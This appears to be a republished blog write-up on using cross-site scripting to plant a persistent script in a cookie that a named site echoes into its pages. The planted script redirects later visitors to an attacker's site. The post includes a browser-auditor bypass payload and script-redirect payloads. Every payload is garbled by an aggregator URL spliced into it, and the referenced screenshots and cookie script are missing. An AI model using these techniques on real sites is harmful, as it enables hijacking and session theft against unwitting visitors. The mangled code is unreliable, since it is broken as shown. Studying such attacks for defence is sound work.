首页 > 代码库 > XSS for domain takeover
XSS for domain takeover
TLDR
(with thanks to CapnWarhol for the summary)- If you can execute XSS code on a site, you can set cookies
- If you can set cookies, there may be one which outputs in-page on every request
- If you save script in that cookie, you can send <script>window.location.href=http://www.mamicode.com/“http://my-website.com/”</script> with every infected request, and functionally “take over” the domain.
Who doesn’t love XSS? Simple to find, simple to execute, and sometimes simple to bypass XSS auditors.
For bypassing Chrome auditor, if the XSS is printed directly in a <script> tag then it’ll bypass the XSS auditor. Example: index.php?value=http://www.mamicode.com/123
Prints into HTML: <script>var value=http://www.mamicode.com/‘123’;</script> - so if we use index.php?value=k’-alert(0)-‘k, then our xss will execute bypassing all auditors.
Firefox is simple.. no XSS protection. Safari (for mobile users) is typically the same as Chrome and blocks most stuff, and IE? Well who uses IE.
C‘mon, show me the XSS domain takeover
Ok so onward to how XSS can take over domains! First, we must find a vulnerable cookie that is printed into the DOM of the HTML, and for this example we’re going to use InstaShag.com.In the screenshot below, we can see if the cookie “site” is set to XSS, it’ll be printed into the DOM of the HTML. This is our vulnerable cookie.
Notice how it also sets the cookie value back to the XSS? So this is persisent. Brilliant. Now we need XSS to set this cookie.
5 mins later…
That was easy! Now let’s create a script to set the cookie. (With thanks to google because i’m lazy to code JS).
So this will remove the cookie, and re-set it to our XSS. Now let’s visit Instashag.com and see what happens…
So simple XSS just injected xss to the cookie, and now anytime someone visits my site, then visits instashag.com, will have the XSS executed.
Note: They only have to visit my site ONCE to have the XSS injected to the cookie. From then on anytime they visit Instashag, XSS will execute (if you set the cookie length to expire in like a year or w/e).
So how did you take over the domain?
Set the XSS to <script>top.location.href=http://www.mamicode.com/‘http://www.yoursite.com/’;</script> and they’ll be instantly redirected. :)So is this bad?
Well of course. Many companies who run bug bounties tend to pay low amounts because it’s “nothing special”. XSS exists on so many sites. Imagine if your bank had XSS on it (aswell as a vuln cookie), and you was just browsing the internet minding your own business. Behind the scenes, XSS could of executed without you knowing. Now when you try visit your bank, you could be redirected to a malicious site. Bad huh? But of course, they could of also stole your cookie sessions etc etc.XSS for domain takeover
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。